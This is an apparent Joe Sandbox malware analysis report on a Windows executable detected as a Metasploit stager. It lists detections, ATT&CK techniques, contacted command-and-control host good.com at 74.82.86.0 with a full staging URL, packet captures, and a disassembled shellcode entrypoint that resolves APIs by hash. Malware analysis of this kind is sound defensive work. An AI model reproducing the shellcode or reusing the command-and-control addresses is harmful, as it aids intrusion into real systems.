              Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.3.dr, Amcache.hve.LOG1.3.drBinary or memory string: MsMpEng.exe

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 443_2003_https-df.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              1
              Process Injection
              1
              Process Injection
              OS Credential Dumping11
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              DLL Side-Loading
              LSASS Memory1
              System Information Discovery
              Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636969 Sample: 443_2003_https-df.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 96 12 good.com 2->12 16 Found malware configuration 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 Antivirus / Scanner detection for submitted sample 2->20 22 4 other signatures 2->22 7 443_2003_https-df.exe 2->7         started        signatures3 process4 dnsIp5 14 good.com 74.82.86.0, 443, 49683 RIMBLACKBERRYCA Canada 7->14 10 WerFault.exe 19 16 7->10         started        process6

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              443_2003_https-df.exe78%VirustotalBrowse
              443_2003_https-df.exe84%ReversingLabsWin64.Hacktool.MetaSploit
              443_2003_https-df.exe100%AviraTR/Crypt.XPACK.Gen7
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              good.com
              74.82.86.0
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_Sfalse
                • Avira URL Cloud: safe
                unknown
                http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_Sfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://upx.sf.netAmcache.hve.3.drfalse
                      high
                      https://www.blackberry.com443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160429536.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160712596.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000003.1076984923.00000000005DD000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://good.com/443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          74.82.86.0
                          good.comCanada
                          18705RIMBLACKBERRYCAfalse
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1636969
                          Start date and time:2025-03-13 09:47:13 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 37s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:15
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:443_2003_https-df.exe
                          Detection:MAL
                          Classification:mal96.troj.winEXE@2/6@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 67%
                          • Number of executed functions: 4
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 40.69.147.202, 20.190.159.131, 23.199.214.10, 4.175.87.197
                          • Excluded domains from analysis (whitelisted): onedsblobvmssprdcus02.centralus.cloudapp.azure.com, fs.microsoft.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          04:48:42API Interceptor1x Sleep call for process: WerFault.exe modified
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          good.comSecuriteInfo.com.Win32.SpywareX-gen.27164.12067.exeGet hashmaliciousSystemBCBrowse
                          • 52.60.87.163
                          https://kissingwills555.github.io/teethteethGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                          • 108.179.193.59
                          https://down.acting-good.com/Get hashmaliciousUnknownBrowse
                          • 104.21.89.148
                          http://linkangood.com/21ef897172770ca75d.jsGet hashmaliciousUnknownBrowse
                          • 5.149.254.180
                          http://linkangood.comGet hashmaliciousUnknownBrowse
                          • 5.149.254.210
                          https://www.nireos.com/hyperspectral-imaging/Get hashmaliciousUnknownBrowse
                          • 5.149.254.180
                          https://www.google.com/url?sa=i&url=https%3A%2F%2Fwww.nireos.com%2Fhyperspectral-imaging%2F&psig=AOvVaw1JYEwI4H49LZPOWn9fTBOI&ust=1706902416150000&source=images&cd=vfe&opi=89978449&ved=0CBMQjRxqFwoTCKjlrZXxioQDFQAAAAAdAAAAABAEGet hashmaliciousUnknownBrowse
                          • 5.149.254.210
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          RIMBLACKBERRYCAyakov.spc.elfGet hashmaliciousMiraiBrowse
                          • 216.9.249.37
                          z0r0.x86.elfGet hashmaliciousMiraiBrowse
                          • 68.171.249.33
                          g4za.x86.elfGet hashmaliciousUnknownBrowse
                          • 68.171.249.25
                          mpsl.elfGet hashmaliciousUnknownBrowse
                          • 67.223.68.118
                          loligang.ppc.elfGet hashmaliciousMiraiBrowse
                          • 208.93.75.245
                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 206.124.114.77
                          loligang.arm.elfGet hashmaliciousMiraiBrowse
                          • 68.171.237.10
                          m68k.elfGet hashmaliciousUnknownBrowse
                          • 67.223.69.122
                          la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                          • 68.171.237.27
                          sora.mips.elfGet hashmaliciousMiraiBrowse
                          • 67.223.69.118
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          37f463bf4616ecd445d4a1937da06e19faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                          • 74.82.86.0
                          SecuriteInfo.com.FileRepMalware.26489.28570.exeGet hashmaliciousUnknownBrowse
                          • 74.82.86.0
                          Bill Of Ladding & PL AWB No.1669134316.vbsGet hashmaliciousGuLoaderBrowse
                          • 74.82.86.0
                          Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 74.82.86.0
                          FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 74.82.86.0
                          4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 74.82.86.0
                          comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                          • 74.82.86.0
                          comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                          • 74.82.86.0
                          yJLckVp9HE.exeGet hashmaliciousFatalRAT, GhostRat, NitolBrowse
                          • 74.82.86.0
                          No context
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.0024690629542772
                          Encrypted:false
                          SSDEEP:192:G03w+Tukcq0kigMJNOjZThGzuiFQZ24lO8pGw:z3PTukcxkigvjizuiFQY4lO8Yw
                          MD5:C9310E05E3D7E4820A5D100A2FF53974
                          SHA1:F7E01B17A802A1B1D69F0F20EEA32EF27E6847B9
                          SHA-256:FCB2B7F3549BA1086B637C032595EC367B518C49D4F8A8F3F1ABA6DBCA236DDF
                          SHA-512:E266C00CA636D4B193F0D92449855BFF7235643E99DC0B1A56A74E75DF0078A91A35A4D4CEC8D2D048819221880CEBCBA4316A2C68FCB985ADCCB8A6F4CA7EFF
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.2.9.3.1.4.4.3.1.2.3.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.2.9.3.1.5.0.0.9.3.5.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.0.0.f.c.0.1.-.a.5.f.b.-.4.5.0.5.-.8.e.3.4.-.f.2.e.c.d.f.3.9.c.c.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.2.b.f.4.b.d.-.3.f.f.c.-.4.2.9.e.-.9.5.9.b.-.0.f.b.c.4.8.1.c.2.f.a.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.0.4.-.0.0.0.1.-.0.0.1.8.-.9.8.d.0.-.1.3.b.2.f.4.9.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.2.6.6.3.5.8.5.1.8.7.a.0.b.2.c.d.1.c.4.4.a.2.6.6.2.e.9.9.c.3.0.0.0.0.f.f.f.f.!.0.0.0.0.4.0.5.4.b.e.8.8.7.9.b.4.5.8.c.0.3.4.3.4.0.b.1.9.3.1.1.b.a.a.4.2.2.1.8.c.2.1.6.d.!.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 14 streams, Thu Mar 13 08:48:34 2025, 0x1205a4 type
                          Category:dropped
                          Size (bytes):149324
                          Entropy (8bit):1.4891538757814387
                          Encrypted:false
                          SSDEEP:384:vAS7GmDclnQwv//vl2qnvRWi0IeEZSkFrgYy6syQaEjork:4gRsnQwH/nZWi0FwF/y6syQaEjork
                          MD5:3215E0294E86B565B2FE3F2B648A4F69
                          SHA1:56B76251EB533F220136788A62EAFC08FA00715D
                          SHA-256:E7564559044064DFF21A360DCD16C3EC3E0DEF922EEEF4D12FAD722AF2719DE0
                          SHA-512:F31A492278E0836697767A9A4D75851F7B831AA6B897E3B99A28C8DC632BFD441D79F8F9D159F408B8C2923F7B0E11044306407AE6686E0947C2D61160954DE3
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... .........g.........................................^..........T.......8...........T............F..t............ ..........|"..............................................................................eJ.......#......Lw......................T.............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8800
                          Entropy (8bit):3.70785656086467
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJvx0a6YKCKgmf+4bdpDt89blCGy0fW3m:R6lXJJ56YvKgmf+BlCGJfn
                          MD5:7FE14344C9D2F175A3D3FABBDDF6F509
                          SHA1:3773A4C9ECB7F39BEF623392D8C055B034DFFB2F
                          SHA-256:6BE7A3CA288E669CEC3C608F4A78E3D8F060915E880C9A3D28732518FEFB1490
                          SHA-512:2CC234D2EC5FBFF965C8AEAFFB6BCF63DDD9ACD679116C957FE9599108DEA2B2D3656175117E1191D01A06777D0DBB7895E537C86414519929E9EBB835462DDF
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.2.0.<./.P.i.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4719
                          Entropy (8bit):4.502213460567407
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsGJg771I9daWpW8VYFYm8M4JDAOKFByq85kLOeLLBJ8d:uIjfcI7Ob7V9J81lZLdJ8d
                          MD5:9BD85AA9BEFAF1061F4A35563EE02C5D
                          SHA1:80E8B848B1BEA88547A18C6C4952590908C9064D
                          SHA-256:C5CD3A6B873D38B50523429F197B7F9C1E7A013D506F333380B52B19D7985B8A
                          SHA-512:ED2B7ABAE1B6CD4225B58E466AEC965258C8207FED21A1FC1AD61ACE4FF12725E960CC31C6B10DB6CBD97BDA381701057E0690B7B299B6E863328037BAF49E9F
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="758871" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.398660495630439
                          Encrypted:false
                          SSDEEP:6144:X/4fiJoH0ncNXiUjt10q7G/gaocYGBoAWQqZaK7FIeC/FacXMMYfY8a:v4vF7MY6WQqYVtbcMc
                          MD5:47998880EC7914FF94A9E08DD82CE61B
                          SHA1:DC532EE2E960D1968241F7E7E608E5EC2461239D
                          SHA-256:AD237E7E1C08DE8B09ECC4009D4DCD2900858C9EE7D5C4101C2CD8C4EEDDF7E6
                          SHA-512:6D3B347EED576BBA446CC6AF9BBFCD476C9C8166D7000D88501377491A31A632421556391F0C03C4C3A994C41C4CF6EFBA19408BF6EE48E47F45450EE26FD9AC
                          Malicious:false
                          Reputation:low
                          Preview:regfJ...J....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....f...............................................................................................................................................................................................................................................................................................................................................6..9........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):32768
                          Entropy (8bit):3.7645686670896703
                          Encrypted:false
                          SSDEEP:768:lZrDoy6VGYxDdwRx2baNWG0bBAmpsIL1c+YRM:lZ5YzwW8n
                          MD5:BAD7EBB9A66BA3B375B333BEE35AA2B0
                          SHA1:DC41FC14C831B9E9B8DA7053A39BCA8A8210337D
                          SHA-256:C73FCC75346234ED1FA785C8185618FAF9D81632577AE431E5DEC89D7BC5B18C
                          SHA-512:40DAF9028D784846DD4723777E9470B5114EA0619CB63B5657DFD27667E1787905DD5AA79273D61D61D5AE7A053766058C9897EFC3A411698D57D4E81BF25BC9
                          Malicious:false
                          Reputation:low
                          Preview:regfI...I....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....f...............................................................................................................................................................................................................................................................................................................................................0..9HvLE.n......I....`......kI.j5.H...............`............... .......@... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........G...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...
                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                          Entropy (8bit):1.7373895378352873
                          TrID:
                          • Win64 Executable GUI (202006/5) 92.65%
                          • Win64 Executable (generic) (12005/4) 5.51%
                          • Generic Win/DOS Executable (2004/3) 0.92%
                          • DOS Executable Generic (2002/1) 0.92%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:443_2003_https-df.exe
                          File size:7'168 bytes
                          MD5:8d9c0f42baf129d1b430a01463dd7870
                          SHA1:4054be8879b458c034340b19311baa42218c216d
                          SHA256:b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
                          SHA512:02831aafecd02359f63e8f13f50835ccd1e76abfd23b9586156351ca3ce5f7e1cb9846a6c64f538c9a9c9d2b96a0317a10ae5b6ef4631d67b30da61ba3b8db02
                          SSDEEP:24:eFGStrJ9u0/6ikY/nZd8rBQAV2G1Y+HKkn2DOIRwQ78IW29buoR9svcJBepmB:is0mYb4BQWq+H7CO1Q7PWAqoRikJDB
                          TLSH:D2E1B32372391CF6C89C463B4A63D04B65489B347F27E3FA8B14020FB9F201139B1C86
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9$..}E..}E..}E..Z...~E..}E~..E..t=..|E..t=..|E..Rich}E..................PE..d...}<.K..........#......0...........@.........@...
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x140004000
                          Entrypoint Section:.jcho
                          Digitally signed:false
                          Imagebase:0x140000000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x4BC63C7D [Wed Apr 14 22:06:53 2010 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:b4c6fff030479aa3b12625be67bf4914
                          Instruction
                          cld
                          dec eax
                          and esp, FFFFFFF0h
                          call 00007EFF0CE85E81h
                          inc ecx
                          push ecx
                          inc ecx
                          push eax
                          push edx
                          push ecx
                          dec eax
                          xor edx, edx
                          push esi
                          dec eax
                          mov edx, dword ptr [edx+60h]
                          dec eax
                          mov edx, dword ptr [edx+18h]
                          dec eax
                          mov edx, dword ptr [edx+20h]
                          dec eax
                          movzx ecx, word ptr [edx+4Ah]
                          dec eax
                          mov esi, dword ptr [edx+50h]
                          dec ebp
                          xor ecx, ecx
                          dec eax
                          xor eax, eax
                          lodsb
                          cmp al, 61h
                          jl 00007EFF0CE85DB4h
                          sub al, 20h
                          inc ecx
                          ror ecx, 0Dh
                          inc ecx
                          add ecx, eax
                          loop 00007EFF0CE85D9Fh
                          push edx
                          inc ecx
                          push ecx
                          dec eax
                          mov edx, dword ptr [edx+20h]
                          mov eax, dword ptr [edx+3Ch]
                          dec eax
                          add eax, edx
                          cmp word ptr [eax+18h], 020Bh
                          jne 00007EFF0CE85E28h
                          mov eax, dword ptr [eax+00000088h]
                          dec eax
                          test eax, eax
                          je 00007EFF0CE85E19h
                          dec eax
                          add eax, edx
                          inc esp
                          mov eax, dword ptr [eax+20h]
                          mov ecx, dword ptr [eax+18h]
                          dec ecx
                          add eax, edx
                          push eax
                          jecxz 00007EFF0CE85E08h
                          dec eax
                          dec ecx
                          inc ecx
                          mov esi, dword ptr [eax+ecx*4]
                          dec ebp
                          xor ecx, ecx
                          dec eax
                          add esi, edx
                          dec eax
                          xor eax, eax
                          lodsb
                          inc ecx
                          ror ecx, 0Dh
                          inc ecx
                          add ecx, eax
                          cmp al, ah
                          jne 00007EFF0CE85DA3h
                          dec esp
                          add ecx, dword ptr [esp+08h]
                          inc ebp
                          cmp ecx, edx
                          jne 00007EFF0CE85D8Ah
                          pop eax
                          inc esp
                          mov eax, dword ptr [eax+24h]
                          dec ecx
                          add eax, edx
                          inc cx
                          mov ecx, dword ptr [eax+ecx*2]
                          inc esp
                          mov eax, dword ptr [eax+1Ch]
                          dec ecx
                          add eax, edx
                          inc ecx
                          mov eax, dword ptr [eax+ecx*4]
                          dec eax
                          add eax, edx
                          inc ecx
                          pop eax
                          inc ecx
                          pop eax
                          pop esi
                          pop ecx
                          pop edx
                          inc ecx
                          pop eax
                          inc ecx
                          pop ecx
                          inc ecx
                          pop edx
                          dec eax
                          sub esp, 20h
                          inc ecx
                          Programming Language:
                          • [IMP] VS2005 build 50727
                          • [ASM] VS2008 SP1 build 30729
                          • [LNK] VS2008 SP1 build 30729
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x43580x6c.jcho
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x43c80x8.jcho
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x30000x18.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x104e0x1200a4a5deae25708a9e05f50bcad7075c86False0.025390625data0.16810049402497224IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x30000x840x20031b58e4b44359a1fdeebdccbe8f7a423False0.158203125data0.9669929845987311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .jcho0x40000x3d00x400d3df8e69479d1cf00626de02acc9eedaFalse0.8193359375data6.142036294099521IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          DLLImport
                          KERNEL32.dllVirtualAlloc, ExitProcess

                          Download Network PCAP: filteredfull

                          • Total Packets: 12
                          • 443 (HTTPS)
                          • 53 (DNS)
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 13, 2025 09:48:31.447102070 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:31.447150946 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:31.447246075 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:31.477185965 CET49683443192.168.2.974.82.86.0
                          Mar 13, 2025 09:48:31.477202892 CET4434968374.82.86.0192.168.2.9
                          Mar 13, 2025 09:48:33.947495937 CET4434968374.82.86.0192.168.2.9
